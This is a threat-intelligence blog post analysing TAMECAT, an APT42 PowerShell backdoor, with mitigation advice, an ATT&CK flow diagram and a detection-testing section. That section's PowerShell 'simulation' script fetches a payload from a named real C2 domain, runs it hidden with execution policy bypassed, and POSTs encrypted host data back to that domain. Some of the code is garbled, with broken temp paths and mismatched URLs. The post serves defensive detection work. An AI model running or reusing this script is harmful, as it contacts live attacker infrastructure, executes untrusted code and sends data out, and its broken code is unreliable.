SOC Prime Bias: Critical

30 Jan 2026 20:30
newspaper icon Pulsedive Blog

TAMECAT – Analysis of an Iranian PowerShell-Based Backdoor

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
TAMECAT – Analysis of an Iranian PowerShell-Based Backdoor
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

TAMECAT is a PowerShell-based backdoor attributed to the Iran-linked, state-sponsored group APT42 and used for espionage. Delivery begins with a VBScript dropper that conditionally chooses PowerShell or cmd.exe based on detected endpoint security products, then pulls additional components from attacker-controlled hosting domains. The implant uses a Telegram bot for C2 coordination and exfiltrates collected data over HTTPS with custom AES encryption. The campaign primarily targets senior defense and government officials.

Investigation

Researchers examined the initial VBScript dropper, the PowerShell loader (referenced as nconf.txt), and encrypted payload stages. Analysis surfaced heavy command obfuscation, bespoke AES routines, and exfiltration to a glitch.me-hosted domain. The team extracted indicators including malicious URLs, user-agent strings, and filesystem artifacts, and noted TAMECAT’s modular design—allowing it to fetch and execute additional stages on demand.

Mitigation

Use EDR/AV controls that block or constrain script execution, and monitor for wscript.exe spawning powershell.exe or cmd.exe. Enable PowerShell script-block logging and enforce strict execution policies for unsigned scripts. Improve resilience against the initial access vector by training users to recognize phishing and social-engineering tactics.

Response

When TAMECAT indicators are observed, isolate the endpoint, stop malicious PowerShell activity, and collect key artifacts such as config.txt, the loader/config files, and network telemetry. Block associated domains and URLs at proxy/firewall layers, then perform environment-wide hunting for similar PowerShell/VBScript tradecraft and related IOCs.

"graph TB %% Class definitions classDef initial fill:#a6cee3 classDef execution fill:#99ccff classDef defense fill:#fdae6b classDef discovery fill:#b2df8a classDef collection fill:#fb9a99 classDef exfil fill:#cab2d6 classDef c2 fill:#e5d8bd classDef lateral fill:#ffff99 %% Nodes initial_access["<b>Initial Access</b> – <b>T1204.002 User Execution: Malicious File</b><br/>Victim opens a VBScript attachment that launches the infection chain"] class initial_access initial exec_vbs["<b>Execution</b> – <b>T1059.005 Visual Basic</b><br/>VBScript interpreter runs the malicious script"] class exec_vbs execution exec_wmi["<b>Execution</b> – <b>T1047 Windows Management Instrumentation</b><br/>Script uses WMI to enumerate installed antivirus products"] class exec_wmi execution exec_ps["<b>Execution</b> – <b>T1059.001 PowerShell</b><br/>Based on AV check, launches PowerShell via conhost or cmd to download the loader"] class exec_ps execution evasion_obf["<b>Defense Evasion</b> – <b>T1027.013 Encrypted/Encoded</b> & <b>T1027.008 Stripped Payloads</b><br/>Loader employs base64, bitwise NOT, and AES encryption"] class evasion_obf defense evasion_reflect["<b>Defense Evasion</b> – <b>T1620 Reflective Code Loading</b><br/>Decoded code is loaded and executed directly in memory"] class evasion_reflect defense evasion_deob["<b>Defense Evasion</b> – <b>T1140 Deobfuscate/Decode Files or Information</b><br/>Script decodes embedded data before further execution"] class evasion_deob defense discover_sys["<b>Discovery</b> – <b>T1082 System Information Discovery</b> & <b>T1518.001 Software Discovery</b><br/>Collects OS version, computer name, installed software, and AV list"] class discover_sys discovery discover_browser["<b>Discovery</b> – <b>T1217 Browser Information Discovery</b><br/>Remoteu2011debugging of Edge/Chrome to harvest browser data"] class discover_browser discovery collect_screen["<b>Collection</b> – <b>T1113 Screen Capture</b> & <b>T1125 Video Capture</b><br/>Captures screenshots and video of the victim UI"] class collect_screen collection collect_input["<b>Collection</b> – <b>T1056 Input Capture</b><br/>Captures keystrokes and other user input"] class collect_input collection exfil_c2["<b>Exfiltration</b> – <b>T1041 Exfiltration Over C2 Channel</b><br/>Data sent over HTTPS to https://accurate-sprout-porpoise.glitch.me"] class exfil_c2 exfil exfil_enc["<b>Exfiltration</b> – <b>T1573.001 Encrypted Channel: Symmetric Cryptography</b><br/>Data encrypted with AESu2011256 before transmission"] class exfil_enc exfil exfil_encod["<b>Exfiltration</b> – <b>T1132.001 Standard Encoding</b><br/>AES ciphertext is base64u2011encoded"] class exfil_encod exfil c2_web["<b>Command and Control</b> – <b>T1071.001 Web Protocols</b><br/>C2 communications over HTTPS"] class c2_web c2 c2_telegram["<b>Command and Control</b> – <b>T1102.002 Bidirectional Communication</b><br/>Telegram bot used for command and response"] class c2_telegram c2 lateral_move["<b>Lateral Movement</b> – <b>T1210 Exploitation of Remote Services</b><br/>Possible later stage to move across the network"] class lateral_move lateral %% Connections initial_access –>|leads_to| exec_vbs exec_vbs –>|uses| exec_wmi exec_wmi –>|triggers| exec_ps exec_ps –>|downloads| evasion_obf evasion_obf –>|decoded_by| evasion_deob evasion_deob –>|loads_via| evasion_reflect evasion_reflect –>|enables| discover_sys evasion_reflect –>|enables| discover_browser discover_sys –>|feeds| collect_screen discover_browser –>|feeds| collect_screen collect_screen –>|provides_data_to| collect_input collect_input –>|sends_to| exfil_c2 exfil_c2 –>|encrypted_by| exfil_enc exfil_enc –>|encoded_by| exfil_encod exfil_encod –>|transmitted_via| c2_web c2_web –>|communicates_with| c2_telegram c2_telegram –>|may_initiate| lateral_move "

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    1. Recon & C2 Discovery: The attacker runs a PowerShell one‑liner that resolves the malicious domain accurate-sprout-porpoise.glitch.me and initiates a TLS connection to fetch a small configuration file (nconf.txt).
    2. Payload Retrieval: Using Invoke-WebRequest with a custom user‑agent, the attacker downloads the base64‑encoded backdoor script (df32s.txt).
    3. Deobfuscation & Execution: The base64 payload is decoded, saved to %TEMP%tamecat.ps1, and executed via powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden.
    4. Lateral Movement: The backdoor employs WMI (winrm) to spawn a remote process on a neighboring host, demonstrating T1047.
    5. Data Staging & Exfiltration: System information (hostname, OS version) is collected, AES‑encrypted, and posted back to s3.tebi.io/icestorage/df32s.txt.

  • Regression Test Script:

    # ------------------------------------------------------------
# TAMECAT C2 Communication & Data Exfiltration Simulation
# ------------------------------------------------------------

# 1. Resolve malicious domain (C2)
$c2Domain = "accurate-sprout-porpoise.glitch.me"
$c2Ip = [System.Net.Dns]::GetHostAddresses($c2Domain)[0].IPAddressToString
Write-Host "[*] Resolved C2 domain to $c2Ip"

# 2. Fetch configuration (simulated)
$configUrl = "https://$c2Domain/s3.tebi.io/icestorage/config/nconf.txt"
try {
    $config = Invoke-WebRequest -Uri $configUrl -UseBasicParsing -Headers @{ "User-Agent" = "Mozilla/5.0" }
    Write-Host "[*] Config downloaded (`$($config.Content.Length)` bytes)"
} catch {
    Write-Error "Failed to fetch config: $_"
    exit 1
}

# 3. Retrieve the base64‑encoded payload
$payloadUrl = "https://$c2Domain/s3.tebi.io/icestorage/df32s.txt"
$b64Payload = Invoke-WebRequest -Uri $payloadUrl -UseBasicParsing -Headers @{ "User-Agent" = "Mozilla/5.0" }
$payloadBytes = [Convert]::FromBase64String($b64Payload.Content)

# 4. Save & execute payload
$payloadPath = "$env:TEMPtamecat.ps1"
[IO.File]::WriteAllBytes($payloadPath, $payloadBytes)
Write-Host "[*] Payload written to $payloadPath"

# Execute hidden
Start-Process -FilePath "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File `"$payloadPath`"" -WindowStyle Hidden

# 5. Simulate data collection & exfiltration
$sysInfo = @{
    Hostname = $env:COMPUTERNAME
    OS       = (Get-CimInstance Win32_OperatingSystem).Caption
} | ConvertTo-Json

# Encrypt with a static AES key (for demo only)
$aesKey = (1..32 | ForEach-Object { Get-Random -Maximum 256 })
$aes = New-Object System.Security.Cryptography.AesManaged
$aes.Key = $aesKey
$aes.Mode = 'CBC'
$aes.GenerateIV()
$encryptor = $aes.CreateEncryptor()
$plainBytes = [System.Text.Encoding]::UTF8.GetBytes($sysInfo)
$cipherBytes = $encryptor.TransformFinalBlock($plainBytes,0,$plainBytes.Length)
$exfilData = [Convert]::ToBase64String($aes.IV + $cipherBytes)

# POST exfiltrated data back to C2
$exfilUrl = "https://$c2Domain/s3.tebi.io/icestorage/df32s.txt"
Invoke-WebRequest -Uri $exfilUrl -Method POST -Body $exfilData -ContentType "application/octet-stream"

Write-Host "[*] Simulation complete. Data exfiltrated to $exfilUrl"

  • Cleanup Commands:

    # Remove the temporary payload
Remove-Item -Path "$env:TEMPtamecat.ps1" -ErrorAction SilentlyContinue

# Flush DNS cache (helps avoid residual entries)
ipconfig /flushdns

# Stop any lingering hidden PowerShell process started by the payload (if still running)
Get-Process -Name "powershell" | Where-Object { $_.Path -like "*tamecat.ps1*" } | Stop-Process -Force -ErrorAction SilentlyContinue

Write-Host "[*] Cleanup finished."

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free